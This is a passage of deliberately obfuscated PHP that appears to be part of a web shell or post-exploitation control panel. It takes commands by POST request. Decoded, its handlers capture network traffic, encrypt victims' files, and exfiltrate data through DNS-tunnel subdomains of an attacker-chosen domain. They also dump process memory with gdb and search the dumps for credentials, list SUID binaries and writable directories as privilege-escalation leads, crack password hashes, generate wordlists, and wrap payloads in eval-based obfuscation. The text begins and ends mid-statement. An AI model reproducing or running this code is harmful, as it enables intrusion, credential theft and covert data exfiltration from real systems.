["\x73\x74\x61\164\x75\x73" => "\163\x75\143\x63\145\163\163", "\157\x75\164\160\165\164" => $BKvy0]; goto yDfGe; rwUGv: W1rI5: goto oZQA4; fVEZ1: $R0VUu = intval($_POST["\x70\x69\144"]); goto PS2Gd; oZQA4: $BKvy0 = ZmRP5($oZAH8); goto kpBmd; HK17_: case "\x73\164\141\x72\x74\137\x70\x61\x63\x6b\145\x74\x5f\143\x61\x70\164\x75\162\x65": goto maHLe; wVKNj: goto T3cYO; goto QK1Ai; vG7oU: if (empty($slpG2)) { goto XmivF; } goto p8Dmo; g2p9E: $oZAH8 = "\x74\x69\x6d\145\157\x75\164\x20\x31\x30\x20\164\143\x70\144\x75\155\160\x20\55\x69\x20{$zJhs3}\x20\x2d\143\40{$We5Su}\40\x2d\x6e\40\62\x3e\46\61\40\x7c\174\40\x65\143\x68\x6f\40\47\164\x63\x70\144\x75\x6d\160\40\156\x6f\164\x20\x61\x76\x61\151\x6c\141\142\154\x65\x27"; goto rjgq5; F2p8E: file_put_contents($iSL4P, $BKvy0); goto M6AMO; mzqmp: $v1Pog["\x6d\145\163\163\x61\147\x65"] = "\103\157\x6d\155\141\x6e\x64\x20\x65\170\x65\143\165\164\x69\157\x6e\x20\x6e\x6f\164\40\141\x76\x61\x69\x6c\141\x62\154\145\56"; goto ceRjX; rtBii: if (strpos($VeIoq, "\154\x69\156\165\x78") !== false) { goto R5EuK; } goto fTzYE; M6AMO: $v1Pog = ["\163\x74\141\x74\165\163" => "\x73\165\143\x63\x65\163\163", "\157\165\164\x70\165\x74" => $BKvy0, "\146\151\x6c\145" => $iSL4P]; goto GchaI; p8Dmo: $oZAH8 = "\164\151\x6d\x65\157\x75\164\x20\x31\60\x20\164\143\160\144\x75\x6d\160\x20\x2d\x69\40{$zJhs3}\x20\55\x63\40{$We5Su}\40\55\156\40\47{$slpG2}\x27\x20\62\x3e\x26\61\x20\174\174\x20\x65\x63\150\157\40\47\164\x63\x70\144\x75\155\x70\40\156\157\164\40\x61\x76\141\151\x6c\141\142\x6c\145\47"; goto GbS1c; hNE0j: T3cYO: goto IgQsB; unx9N: $iSL4P = sys_get_temp_dir() . "\57\x6a\x61\156\165\x73\x5f\x63\141\x70\x74\165\x72\145\137" . time() . "\x2e\164\170\164"; goto rtBii; IgQsB: $BKvy0 = ZMrP5($oZAH8); goto F2p8E; rV2W3: goto vbH70; goto wVKNj; STrSG: XmivF: goto g2p9E; QK1Ai: R5EuK: goto vG7oU; uHBZu: Xhk3Q: goto CDVzh; FhUXZ: $We5Su = intval($_POST["\143\157\165\156\x74"] ?? 50); goto flNR7; maHLe: $zJhs3 = $_POST["\151\x6e\x74\x65\x72\146\x61\x63\145"] ?? "\141\x6e\x79"; goto FhUXZ; KV0oF: if (!(!lIX3F("\x65\170\x65\x63") && !LIx3F("\x73\x68\x65\154\x6c\x5f\145\170\x65\x63"))) { goto Xhk3Q; } goto mzqmp; fTzYE: $v1Pog["\x6d\x65\x73\163\x61\147\x65"] = "\x50\141\x63\x6b\145\164\x20\x63\x61\160\164\165\162\145\x20\x6f\156\154\x79\x20\x61\x76\x61\151\x6c\x61\x62\154\x65\x20\x6f\x6e\x20\x4c\151\x6e\165\170\x20\x73\x79\x73\164\145\x6d\x73\x20\167\151\164\x68\40\164\143\x70\x64\x75\155\x70\56"; goto rV2W3; ceRjX: goto vbH70; goto uHBZu; rjgq5: EUJYw: goto hNE0j; flNR7: $slpG2 = $_POST["\x66\x69\x6c\164\145\162"] ?? ''; goto KV0oF; CDVzh: $VeIoq = strtolower(php_uname("\x73")); goto unx9N; GbS1c: goto EUJYw; goto STrSG; GchaI: goto vbH70; goto uCTao; uCTao: case "\145\156\143\x72\171\160\x74\137\x66\x69\x6c\x65": goto dA4_2; A151j: Joseo: goto im24n; pnHFg: goto ZYBGA; goto RtRkN; im24n: $siOBH = file_get_contents($UKZxE); goto hf3pm; fRmkE: if (!(!is_file($UKZxE) || !is_readable($UKZxE))) { goto Joseo; } goto JVK8I; RtRkN: YzjIn: goto h_2h0; E_nej: goto vbH70; goto A151j; HKCSA: $IMtDv = $_POST["\x70\141\163\x73\167\x6f\162\x64"]; goto fRmkE; JVK8I: $v1Pog["\155\x65\x73\x73\141\147\x65"] = "\106\x69\x6c\145\40\x6e\157\164\40\x66\x6f\x75\156\x64\40\x6f\x72\40\x6e\157\x74\x20\x72\x65\x61\x64\x61\x62\154\x65\56"; goto E_nej; h_2h0: $v1Pog = ["\x73\x74\141\164\x75\x73" => "\163\165\x63\x63\x65\x73\x73", "\x6d\x65\x73\x73\x61\147\x65" => "\x46\x69\x6c\145\x20\x65\x6e\143\162\x79\160\x74\x65\x64\x20\163\x75\143\x63\145\x73\163\x66\x75\x6c\x6c\x79\56", "\157\165\x74\x70\165\x74\137\x66\151\x6c\145" => $iSL4P]; goto PY74o; PY74o: ZYBGA: goto GKC_6; j3SGb: $v1Pog["\x6d\145\163\163\141\x67\145"] = "\106\141\x69\x6c\145\144\40\164\157\40\167\x72\x69\x74\x65\x20\x65\x6e\x63\162\x79\160\164\x65\x64\x20\146\x69\x6c\145\56"; goto pnHFg; hf3pm: $Mc1GJ = openssl_encrypt($siOBH, "\x41\105\123\55\62\65\x36\x2d\103\x42\x43", hash("\163\x68\141\62\x35\x36", $IMtDv, true), 0, $hsT2P = openssl_random_pseudo_bytes(16)); goto ATq8J; dA4_2: $UKZxE = $_POST["\x66\151\x6c\145\x5f\160\141\164\150"]; goto HKCSA; ATq8J: $Mc1GJ = base64_encode($hsT2P . $Mc1GJ); goto Man92; Man92: $iSL4P = $UKZxE . "\56\145\x6e\x63\162\171\160\164\145\x64"; goto u_e09; u_e09: if (file_put_contents($iSL4P, $Mc1GJ)) { goto YzjIn; } goto j3SGb; GKC_6: goto vbH70; goto olIWx; olIWx: case "\x64\145\143\162\x79\160\164\x5f\146\151\154\x65": goto zC4dP; O74YT: goto vbH70; goto FwXuy; tSmXY: $IMtDv = $_POST["\160\141\x73\x73\167\157\162\x64"]; goto XU7TC; fuFHn: goto vbH70; goto yTHTv; pEHsh: $hsT2P = substr($Mc1GJ, 0, 16); goto ZcgCb; p82au: goto vbH70; goto NPb7S; XzNUW: $v1Pog["\155\x65\163\x73\x61\x67\x65"] = "\x46\x69\154\145\40\x6e\x6f\x74\x20\146\157\x75\x6e\144\x20\157\162\x20\x6e\157\x74\40\x72\x65\141\x64\141\x62\154\x65\56"; goto fuFHn; ZGzJW: z_n9O: goto p82au; XU7TC: if (!(!is_file($UKZxE) || !is_readable($UKZxE))) { goto xhMzy; } goto XzNUW; yTHTv: xhMzy: goto azBo8; yDIIy: $v1Pog = ["\163\164\141\164\165\x73" => "\x73\x75\x63\143\x65\x73\163", "\x6d\145\163\x73\141\x67\145" => "\106\x69\154\x65\40\144\x65\x63\162\x79\160\x74\x65\144\x20\x73\165\x63\143\145\163\163\146\x75\x6c\x6c\x79\x2e", "\x6f\165\x74\x70\165\164\137\x66\151\x6c\x65" => $iSL4P]; goto ZGzJW; iedSI: $AXEU0 = openssl_decrypt($siOBH, "\101\105\x53\55\x32\65\x36\55\103\x42\x43", hash("\x73\150\141\x32\65\x36", $IMtDv, true), 0, $hsT2P); goto U4wvI; FwXuy: kRrCA: goto AkAvs; f67V_: $v1Pog["\x6d\x65\x73\163\141\147\145"] = "\x46\141\151\x6c\x65\144\x20\x74\157\x20\x77\x72\151\164\x65\x20\x64\145\143\x72\x79\160\164\145\x64\40\146\151\x6c\145\x2e"; goto UkYS3; U4wvI: if (!($AXEU0 === false)) { goto kRrCA; } goto lgflL; UkYS3: goto z_n9O; goto XJoM0; nRicT: if (file_put_contents($iSL4P, $AXEU0)) { goto fAEbD; } goto f67V_; zC4dP: $UKZxE = $_POST["\146\151\154\145\137\160\x61\164\x68"]; goto tSmXY; ZcgCb: $siOBH = substr($Mc1GJ, 16); goto iedSI; AkAvs: $iSL4P = preg_replace("\x2f\x5c\x2e\145\x6e\143\162\171\160\x74\x65\144\44\x2f", '', $UKZxE) . "\x2e\144\x65\x63\x72\x79\160\164\x65\144"; goto nRicT; lgflL: $v1Pog["\x6d\145\x73\163\x61\x67\x65"] = "\x44\x65\x63\162\171\160\164\151\x6f\156\x20\146\141\x69\154\145\x64\x2e\40\127\162\x6f\156\147\x20\160\x61\x73\163\167\157\162\x64\40\157\162\40\143\x6f\162\x72\165\x70\164\x65\x64\40\x66\151\154\145\x2e"; goto O74YT; azBo8: $Mc1GJ = base64_decode(file_get_contents($UKZxE)); goto pEHsh; XJoM0: fAEbD: goto yDIIy; NPb7S: case "\x64\156\x73\x5f\164\x75\x6e\156\145\154\137\163\x65\156\x64": goto fLIPn; BTOof: $NMK6a = 60; goto n5U3M; n5U3M: $wSe9x = base64_encode($siOBH); goto AcqWW; lMzBl: G0XIp: goto outnO; yK6Ey: $WL9G4 = $_POST["\x64\157\x6d\141\x69\156"] ?? "\145\x78\x61\155\x70\x6c\x65\56\x63\x6f\155"; goto BTOof; XZuBc: goto vbH70; goto CNHPc; AcqWW: $yVsNc = str_split($wSe9x, $NMK6a); goto B3hmq; wxFpe: foreach ($yVsNc as $jY45d => $AS2t_) { goto pWqRp; Ca3um: qQKNV: goto WxgAO; xBHat: $olRGv = @dns_get_record($TYMXt, DNS_A); goto axlHl; axlHl: $gSi8X[] = ["\x63\150\x75\156\x6b" => $AS2t_, "\x73\165\x62\144\x6f\155\x61\x69\156" => $TYMXt, "\x72\145\x73\x6f\154\x76\145\144" => !empty($olRGv)]; goto Ca3um; pWqRp: $TYMXt = $AS2t_ . "\x2e" . $jY45d . "\x2e" . $WL9G4; goto xBHat; WxgAO: } goto lMzBl; fLIPn: $siOBH = $_POST["\144\x61\164\x61"]; goto yK6Ey; B3hmq: $gSi8X = []; goto wxFpe; outnO: $v1Pog = ["\x73\164\141\164\165\163" => "\x73\x75\x63\x63\x65\163\163", "\162\145\x73\165\154\x74\163" => $gSi8X, "\155\145\x73\x73\x61\147\x65" => "\104\x4e\123\x20\x74\x75\156\156\145\x6c\x20\x64\x61\x74\x61\x20\163\145\156\164\x2e"]; goto XZuBc; CNHPc: case "\x64\156\163\137\164\165\156\156\145\154\137\162\145\143\x65\x69\166\x65": goto wmgK5; j03cy: foreach ($mrpFt as $rbyMz) { goto U8vj2; oHegO: LV9cI: goto H9_Jf; U8vj2: if (!isset($rbyMz["\x74\170\164"])) { goto LV9cI; } goto rm3Np; rm3Np: $siOBH .= $rbyMz["\x74\170\x74"]; goto oHegO; H9_Jf: q1z8s: goto qupmz; qupmz: } goto WjjlU; Lossa: if (empty($mrpFt)) { goto ao8zQ; } goto j03cy; PybJF: goto vbH70; goto w2pe1; wHI5I: ao8zQ: goto UxTZa; UxTZa: $yDKeU = base64_decode($siOBH); goto uhMMM; uhMMM: $v1Pog = ["\163\x74\x61\164\165\163" => "\163\165\x63\x63\x65\163\x73", "\x64\141\x74\141" => $yDKeU, "\162\141\167" => $siOBH]; goto PybJF; EXVxB: $mrpFt = @dns_get_record($WL9G4, DNS_TXT); goto gy5G_; wmgK5: $WL9G4 = $_POST["\144\157\155\x61\151\x6e"] ?? "\145\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\155"; goto EXVxB; WjjlU: fdoS0: goto wHI5I; gy5G_: $siOBH = ''; goto Lossa; w2pe1: case "\144\165\x6d\160\137\x70\162\x6f\x63\x65\x73\x73\137\x6d\145\155\157\162\171": goto jHqqo; KdT89: $v1Pog = ["\163\164\141\164\x75\x73" => "\163\165\143\x63\x65\x73\x73", "\x6d\145\163\x73\x61\x67\x65" => "\x4d\x65\x6d\157\x72\x79\x20\x6d\141\x70\x73\x20\162\145\x74\162\x69\145\x76\x65\144\56", "\157\x75\x74\160\165\x74" => $BKvy0, "\146\151\154\145" => '']; goto BhpkZ; AgjUF: $v1Pog["\155\145\x73\163\141\147\145"] = "\x4d\x65\155\157\x72\x79\40\144\x75\x6d\160\x20\157\x6e\154\171\40\141\x76\141\x69\154\141\x62\x6c\145\40\x6f\x6e\40\x4c\x69\x6e\165\x78\x20\163\x79\163\164\x65\155\x73\x2e"; goto iu1xs; jHqqo: $R0VUu = intval($_POST["\x70\151\x64"]); goto KpW1z; PjLyz: $iSL4P = sys_get_temp_dir() . "\x2f\x6a\141\x6e\165\163\137\155\145\x6d\144\165\155\x70\x5f" . $R0VUu . "\137" . time() . "\x2e\x64\x75\x6d\x70"; goto QLSe0; v8EsU: OUEFx: goto A442j; ZgOBK: $BKvy0 = zMRp5($oZAH8); goto mnjyD; avmwI: goto vbH70; goto aW2eu; A442j: $dwgDQ = filesize($iSL4P); goto eGQcP; iu1xs: goto zzp7j; goto XHV1w; QLSe0: if (strpos($VeIoq, "\x6c\x69\156\165\170") !== false) { goto OpYim; } goto AgjUF; eGQcP: $v1Pog = ["\163\x74\141\x74\165\x73" => "\163\x75\x63\x63\145\163\x73", "\155\145\x73\x73\141\147\145" => "\x4d\x65\155\x6f\162\x79\x20\144\x75\155\160\x65\144\x20\164\x6f\x20{$iSL4P}", "\146\x69\x6c\x65" => $iSL4P, "\163\151\172\145" => $dwgDQ, "\x6f\x75\x74\x70\165\x74" => $BKvy0]; goto RvMBz; mnjyD: if (file_exists($iSL4P)) { goto OUEFx; } goto KdT89; BhpkZ: goto dsGME; goto v8EsU; XHV1w: OpYim: goto KtzTo; KpW1z: $VeIoq = strtolower(php_uname("\163")); goto PjLyz; KtzTo: $oZAH8 = "\x67\x64\142\x20\x2d\142\141\164\143\x68\40\55\145\170\x20\47\x61\x74\x74\141\x63\x68\40{$R0VUu}\47\40\x2d\x65\x78\x20\47\147\145\x6e\145\x72\141\164\145\55\143\x6f\x72\x65\x2d\146\x69\x6c\145\x20{$iSL4P}\47\40\55\x65\x78\40\47\x64\x65\164\141\x63\x68\47\40\55\x65\170\x20\x27\161\165\x69\164\47\x20\62\x3e\46\x31\x20\x7c\174\x20\143\x61\164\40\57\160\x72\157\143\x2f{$R0VUu}\x2f\x6d\x61\160\163\x20\62\x3e\46\x31"; goto ZgOBK; h28ZB: zzp7j: goto avmwI; RvMBz: dsGME: goto h28ZB; aW2eu: case "\141\x6e\141\x6c\171\172\x65\x5f\155\x65\155\157\162\x79\x5f\144\165\155\x70": goto rWBnX; WRjYv: preg_match_all($G6Mdr, $Lrz4Z, $UP6I2); goto kNTtQ; kNTtQ: $gSi8X["\x63\x72\145\x64\145\156\x74\151\x61\154\163"] = array_unique($UP6I2[0]); goto KuXjQ; DYzCK: $Rx7yc = $_POST["\160\x61\164\164\145\x72\156"] ?? ''; goto N69Ab; zt47q: $v1Pog = ["\163\x74\x61\164\165\x73" => "\x73\x75\x63\143\145\x73\163", "\162\x65\x73\x75\154\x74\163" => $gSi8X]; goto I2Ta6; HEu5N: $G6Mdr = "\57" . preg_quote($Rx7yc, "\57") . "\57\151"; goto WRjYv; sNGkc: $v1Pog["\155\145\x73\x73\x61\147\145"] = "\x44\x75\x6d\x70\x20\146\151\154\145\40\x6e\x6f\164\x20\146\x6f\x75\x6e\x64\56"; goto FCFQj; sPG8Y: if (empty($Rx7yc)) { goto ZpVg3; } goto HEu5N; g1Vo6: $gSi8X["\163\x74\x72\151\156\x67\x73"] = array_slice(array_unique($I5WkF[0]), 0, 100); goto sPG8Y; KuXjQ: ZpVg3: goto zt47q; gX1Yo: $Lrz4Z = file_get_contents($UKZxE); goto V064Z; V064Z: $gSi8X = ["\163\151\x7a\145" => filesize($UKZxE), "\163\164\x72\151\156\x67\x73" => [], "\143\162\145\x64\145\156\164\151\141\x6c\163" => []]; goto GmaKe; I2Ta6: goto vbH70; goto fh1mM; GmaKe: preg_match_all("\x2f\x5b\133\72\160\x72\x69\x6e\164\72\135\135\173\x34\54\175\57", $Lrz4Z, $I5WkF); goto g1Vo6; Ad1fS: QQUW1: goto gX1Yo; N69Ab: if (!(!is_file($UKZxE) || !is_readable($UKZxE))) { goto QQUW1; } goto sNGkc; FCFQj: goto vbH70; goto Ad1fS; rWBnX: $UKZxE = $_POST["\x66\151\x6c\x65\137\x70\x61\164\150"]; goto DYzCK; fh1mM: case "\163\165\147\147\145\163\164\x5f\x65\x78\x70\154\x6f\x69\164\x73": goto VScOI; Qt0lr: $v1Pog = ["\x73\164\141\x74\x75\163" => "\x73\165\143\143\x65\x73\x73", "\x73\x75\147\x67\145\x73\164\x69\157\x6e\163" => $uQWso, "\x6f\163\x5f\x69\x6e\146\157" => $ZkhQm]; goto r1wNj; S7oCr: $MOcEd = ZMRP5("\146\x69\156\144\x20\57\x74\155\160\40\x2f\166\x61\x72\57\x74\155\x70\40\55\x74\171\160\x65\40\144\x20\55\x77\162\151\x74\141\x62\x6c\x65\40\62\76\x2f\x64\x65\166\x2f\156\165\x6c\154\x20\x7c\40\150\145\141\144\40\x2d\61\60"); goto yLZ0h; xJQbR: ey3Up: goto S7oCr; YeW4g: if (empty($dd4Mu)) { goto ey3Up; } goto R21GW; fC3xk: $dd4Mu = ZMrp5("\146\x69\x6e\x64\x20\x2f\165\163\x72\57\x62\x69\x6e\x20\x2f\165\163\162\57\x73\142\151\156\40\x2d\x70\x65\162\155\x20\55\64\60\60\x30\x20\x32\76\57\x64\145\x76\57\x6e\165\x6c\x6c\40\x7c\x20\x68\145\x61\x64\40\55\x32\60"); goto YeW4g; aarp9: $WvCyc = PHP_VERSION; goto kd0iq; q1rJH: $Pa3UT = strtolower(php_uname("\x73")); goto pnq5E; VScOI: $ZkhQm = php_uname(); goto iHgxc; iHgxc: $gmLqH = php_uname("\162"); goto q1rJH; S0Q_f: F6Zqx: goto xJQbR; kd0iq: $uQWso[] = ["\x74\x79\160\145" => "\x50\110\x50\x20\105\170\160\154\x6f\151\x74", "\144\x65\163\143\162\151\x70\164\x69\x6f\x6e" => "\120\x48\120\x20\126\x65\162\163\151\157\156\72\x20" . $WvCyc, "\x73\x65\141\x72\143\150" => "\x70\x68\160\40" . $WvCyc . "\x20\x65\x78\x70\x6c\157\x69\x74"]; goto fC3xk; owyHF: if (!(strpos($Pa3UT, "\x6c\151\156\165\170") !== false)) { goto Y_IR7; } goto ZGGUD; r1wNj: goto vbH70; goto uT4XP; pnq5E: $uQWso = []; goto owyHF; ZEsBq: Y_IR7: goto aarp9; shBw4: nPwS3: goto Qt0lr; l8cB7: $uQWso[] = ["\x74\x79\x70\x65" => "\127\x72\x69\x74\141\142\x6c\145\x20\x44\151\x72\145\143\164\x6f\162\171", "\144\x65\163\x63\x72\x69\160\x74\151\157\156" => "\x57\162\x69\164\x61\142\x6c\145\x20\x64\151\162\145\143\x74\157\162\151\x65\163\x20\146\x6f\x75\156\144", "\163\145\x61\x72\x63\x68" => "\x6c\151\156\x75\x78\x20\x77\x72\151\164\x61\x62\x6c\145\40\144\151\x72\x65\x63\x74\157\162\x79\x20\x65\170\160\x6c\157\151\x74"]; goto shBw4; R21GW: $sGmdR = explode("\xa", trim($dd4Mu)); goto pHLgl; yLZ0h: if (empty($MOcEd)) { goto nPwS3; } goto l8cB7; ZGGUD: $uQWso[] = ["\164\171\x70\145" => "\113\145\x72\156\145\154\x20\x45\x78\x70\154\157\x69\x74", "\x64\x65\163\143\162\151\160\164\x69\157\x6e" => "\x43\x68\x65\143\x6b\40\x6b\x65\162\156\x65\154\40\166\145\x72\163\151\x6f\156\72\x20" . $gmLqH, "\x73\145\141\x72\x63\x68" => "\154\151\156\165\x78\x20\x6b\x65\162\x6e\x65\x6c\40" . explode("\x2e", $gmLqH)[0] . "\x2e" . explode("\x2e", $gmLqH)[1]]; goto ZEsBq; pHLgl: foreach ($sGmdR as $ozWf2) { goto Ywo8q; Ywo8q: $GkY58 = basename(trim($ozWf2)); goto PkKqk; V82oZ: W13Ec: goto Ht4vX; PkKqk: $uQWso[] = ["\164\x79\160\x65" => "\x53\125\x49\x44\40\102\x69\156\x61\162\171", "\144\145\163\x63\162\x69\x70\164\x69\157\x6e" => "\123\x55\111\x44\x20\x62\x69\156\141\x72\171\x20\146\157\x75\x6e\x64\x3a\x20" . $GkY58, "\163\145\x61\162\143\x68" => $GkY58 . "\x20\160\x72\x69\166\151\154\145\147\145\x20\x65\x73\143\x61\x6c\141\164\x69\x6f\x6e"]; goto V82oZ; Ht4vX: } goto S0Q_f; uT4XP: case "\x63\x72\x61\x63\153\137\x68\141\163\x68": goto K2cim; H_kuG: $dwYcQ = "\165\x6e\153\156\157\167\x6e"; goto AFrSJ; b_DmW: $gSi8X = []; goto nr7ST; bm_lM: FhsXM: goto dlRQ2; nHf0Y: $gSi8X["\155\x65\x73\x73\141\x67\x65"] = "\x48\141\x73\x68\40\156\157\x74\40\143\x72\x61\143\153\x65\x64\x20\167\151\164\150\x20\x63\157\155\x6d\x6f\156\40\160\x61\x73\x73\167\157\x72\144\x73\x2e\x20\125\x73\145\x20\x65\170\164\145\x72\x6e\x61\x6c\40\x74\157\157\154\x73\x20\x6c\151\x6b\x65\40\150\x61\163\x68\143\141\164\40\x6f\162\x20\152\157\150\156\x2e"; goto oJQfo; oajox: $dwYcQ = "\x6d\x64\x35\x5f\143\162\x79\160\164"; goto bm_lM; NZnkf: McOKF: goto fK7fI; AFrSJ: goto FhsXM; goto XTDah; HCPfH: goto FhsXM; goto oz3c0; XTDah: LXJi2: goto ZgHBa; oJQfo: BMwAj: goto kJ8oV; kJ8oV: $v1Pog = ["\x73\164\141\164\165\163" => "\163\165\x63\143\x65\x73\163", "\150\x61\x73\150\137\x74\171\x70\x65" => $dwYcQ, "\162\x65\x73\x75\x6c\x74\163" => $gSi8X]; goto gVde8; EW_2m: $ObM5k = $_POST["\167\x6f\x72\x64\154\151\x73\x74"] ?? ''; goto b_DmW; K2cim: $d0y0k = $_POST["\x68\x61\163\150"]; goto Jx0mr; MEUfr: goto FhsXM; goto nv0Ia; dlRQ2: iur8T: goto gqI1t; RyQOS: vvFSm: goto NmuQo; r61lG: if ($u_Poq === 40 && ctype_xdigit($d0y0k)) { goto QsjXv; } goto lxHEi; gVde8: goto vbH70; goto xfHuf; ltpSX: if ($u_Poq === 32 && ctype_xdigit($d0y0k)) { goto LXJi2; } goto r61lG; nDM1v: if (strpos($d0y0k, "\44\x32") === 0) { goto McOKF; } goto WqYcR; WqYcR: if (strpos($d0y0k, "\44\61\x24") === 0) { goto yNK41; } goto H_kuG; B7fO2: $gSi8X["\x63\162\x61\x63\x6b\145\x64"] = false; goto nHf0Y; J1yR1: $u_Poq = strlen($d0y0k); goto ltpSX; M7N4E: goto FhsXM; goto NZnkf; igl3k: $dwYcQ = "\x73\x68\141\x32\x35\66"; goto M7N4E; ZgHBa: $dwYcQ = "\155\144\x35"; goto MEUfr; nv0Ia: QsjXv: goto tv7iL; NmuQo: if (!empty($gSi8X["\143\162\x61\143\153\x65\144"])) { goto BMwAj; } goto B7fO2; fK7fI: $dwYcQ = "\x62\143\162\x79\160\164"; goto HCPfH; nr7ST: if (!($dwYcQ === "\141\165\x74\x6f")) { goto iur8T; } goto J1yR1; Jx0mr: $dwYcQ = $_POST["\150\141\x73\x68\x5f\164\171\x70\145"] ?? "\x61\165\x74\x6f"; goto EW_2m; tv7iL: $dwYcQ = "\x73\150\x61\x31"; goto d90jE; d90jE: goto FhsXM; goto M_Bf4; oz3c0: yNK41: goto oajox; RlsHA: foreach ($Sl0TC as $F8j10) { goto ejXYY; b3DnM: N4_4O: goto kYfl4; IDqG0: nFLZ0: goto oxDKb; PC8zG: goto vvFSm; goto IDqG0; vd0Pa: switch ($dwYcQ) { case "\155\x64\x35": $X6OhY = md5($F8j10); goto SfCVg; case "\163\x68\x61\61": $X6OhY = sha1($F8j10); goto SfCVg; case "\x73\150\141\x32\65\x36": $X6OhY = hash("\x73\150\141\62\65\x36", $F8j10); goto SfCVg; } goto b3DnM; kYfl4: SfCVg: goto rgMdO; ejXYY: $X6OhY = ''; goto vd0Pa; rgMdO: if (!($X6OhY === $d0y0k)) { goto nFLZ0; } goto QaWBM; ctJfE: $gSi8X["\160\141\x73\x73\x77\x6f\162\144"] = $F8j10; goto PC8zG; oxDKb: xP3yP: goto OOo8A; QaWBM: $gSi8X["\x63\x72\141\x63\153\145\144"] = true; goto ctJfE; OOo8A: } goto RyQOS; gqI1t: $Sl0TC = ["\160\141\163\163\167\157\162\x64", "\x31\62\x33\64\x35\66", "\x61\x64\155\x69\x6e", "\x72\x6f\157\x74", "\164\145\x73\x74", "\x70\141\163\x73\x77\x6f\162\144\x31\62\63", "\x61\144\x6d\151\x6e\61\x32\63"]; goto RlsHA; lxHEi: if ($u_Poq === 64 && ctype_xdigit($d0y0k)) { goto zH0Y8; } goto nDM1v; M_Bf4: zH0Y8: goto igl3k; xfHuf: case "\x67\x65\x6e\145\x72\141\164\x65\137\167\157\x72\144\x6c\x69\163\x74": goto ymuE0; ymuE0: $VsvtG = explode("\12", $_POST["\142\x61\x73\145\137\x77\x6f\x72\144\163"] ?? ''); goto hQL1Z; CNy2E: $v1Pog = ["\x73\164\141\x74\165\163" => "\163\x75\143\x63\145\163\x73", "\167\x6f\162\x64\154\x69\163\164\137\x66\x69\154\x65" => $iSL4P, "\143\x6f\165\156\164" => count($ObM5k)]; goto TKQp6; lyjdW: $iSL4P = sys_get_temp_dir() . "\x2f\152\141\x6e\165\x73\x5f\x77\x6f\162\144\154\151\163\x74\x5f" . time() . "\56\164\x78\164"; goto JUd4Q; JUd4Q: file_put_contents($iSL4P, implode("\xa", array_unique($ObM5k))); goto CNy2E; hQL1Z: $wxzk3 = $_POST["\160\141\x74\x74\x65\162\156\x73"] ?? ["\173\x77\157\x72\144\175", "\x7b\x77\x6f\x72\144\175\x31\62\x33", "\173\x77\x6f\162\144\175\x32\60\62\64", "\x7b\x77\x6f\162\144\x7d\x21"]; goto B7f_w; TKQp6: goto vbH70; goto bUUpy; w4vCS: $ObM5k = []; goto oh26S; oh26S: foreach ($VsvtG as $wK9IS) { goto pKK5b; pKK5b: $wK9IS = trim($wK9IS); goto IhCJB; IhCJB: if (!empty($wK9IS)) { goto rOzDH; } goto jr6Ut; KmxAT: foreach ($uOVxY as $G6Mdr) { $ObM5k[] = str_replace("\173\167\157\x72\144\x7d", $wK9IS, $G6Mdr); iAczX: } goto pfYXB; dOlQ1: rOzDH: goto KmxAT; jr6Ut: goto xe0WB; goto dOlQ1; pfYXB: uLTYR: goto vaogs; vaogs: xe0WB: goto kwlGN; kwlGN: } goto HUJ5O; mONDC: $uOVxY = ["\x7b\167\x6f\162\144\x7d", "\173\x77\x6f\x72\144\x7d\x31\x32\63", "\173\x77\x6f\162\x64\x7d\x32\60\x32\64", "\x7b\167\x6f\x72\144\175\41"]; goto pZ5qh; pZ5qh: j7Rgo: goto w4vCS; HUJ5O: e_1Hi: goto lyjdW; WLKsL: if (is_array($uOVxY)) { goto j7Rgo; } goto mONDC; B7f_w: $uOVxY = is_array($wxzk3) ? $wxzk3 : (is_string($wxzk3) ? json_decode($wxzk3, true) : ["\x7b\x77\157\x72\144\x7d", "\173\167\x6f\x72\144\x7d\61\x32\63", "\173\x77\157\x72\x64\175\62\60\62\x34", "\173\167\x6f\162\x64\x7d\x21"]); goto WLKsL; bUUpy: case "\157\x62\146\165\163\x63\x61\x74\x65\137\143\x6f\x64\145": goto ISG88; cnUAE: hKMsV: goto G3Xk2; G3Xk2: ct6Ub: goto qVKXs; T1l91: switch ($FV7uX) { case "\142\141\x73\145\x36\x34": $BbbEp = "\x65\166\x61\154\50\142\141\x73\x65\66\64\x5f\144\x65\x63\157\144\x65\x28\x22" . base64_encode($RFZ8l) . "\42\51\x29\73"; goto ct6Ub; case "\x68\x65\x78": $BbbEp = "\145\x76\x61\x6c\50\x68\145\170\62\142\x69\156\50\x22" . bin2hex($RFZ8l) . "\42\x29\51\73"; goto ct6Ub; case "\x63\x68\162": $BbbEp = "\145\x76\x61\x6c\x28" . mrZR7($RFZ8l) . "\x29\x3b"; goto ct6Ub; case "\x72\157\x74\61\x33": $BbbEp = "\x65\166\x61\154\50\163\164\162\137\162\x6f\x74\61\x33\x28\42" . str_rot13($RFZ8l) . "\x22\x29\51\x3b"; goto ct6Ub; case "\147\172\x69\160": goto cEpY8; w2AA4: goto ct6Ub; goto K9KjM; boqFR: $BbbEp = "\145\x76\141\154\50\147\172\165\156\x63\x6f\x6d\160\x72\145\x73\163\50\x62\x61\x73\x65\66\64\137\144\x65\x63\157\x64\145\50\42" . base64_encode($GgQhr) . "\42\51\51\x29\x3b"; goto w2AA4; cEpY8: $GgQhr = gzcompress($RFZ8l); goto boqFR; K9KjM: case "\x76\x61\x72\151\141\x62\x6c\x65\x5f\x73\160\x6c\x69\164": goto XFb4G; iXaDh: $wvM5s = []; goto CGzc5; POZ4x: $BbbEp = implode("\12", $wvM5s) . "\12\145\166\141\x6c\50\x69\x6d\x70\x6c\157\144\145\x28\47\47\54\x20\x5b" . implode("\x2c\40", array_map(function ($jY45d) { return "\x24\137" . chr(97 + $jY45d); }, range(0, count($CTBeO) - 1))) . "\135\51\51\x3b"; goto Dk3bQ; MzUXK: gn528: goto POZ4x; XFb4G: $CTBeO = str_split($RFZ8l, 100); goto iXaDh; Dk3bQ: goto ct6Ub; goto DmwKf; CGzc5: foreach ($CTBeO as $jY45d => $qgxrn) { goto c6Y9k; rGFZ0: kYgb2: goto ZhS7f; c6Y9k: $pWcdY = "\x24\137" . chr(97 + $jY45d); goto UFX3p; UFX3p: $wvM5s[] = $pWcdY . "\75\42" . addslashes($qgxrn) . "\x22\x3b"; goto rGFZ0; ZhS7f: } goto MzUXK; DmwKf: } goto cnUAE; DHKDe: goto vbH70; goto fAJB1; smVMJ: $BbbEp = ''; goto T1l91; gapob: $FV7uX = $_POST["\155\x65\x74\x68\x6f\144"] ?? "\x62\x61\163\x65\x36\64"; goto smVMJ; ISG88: $RFZ8l = 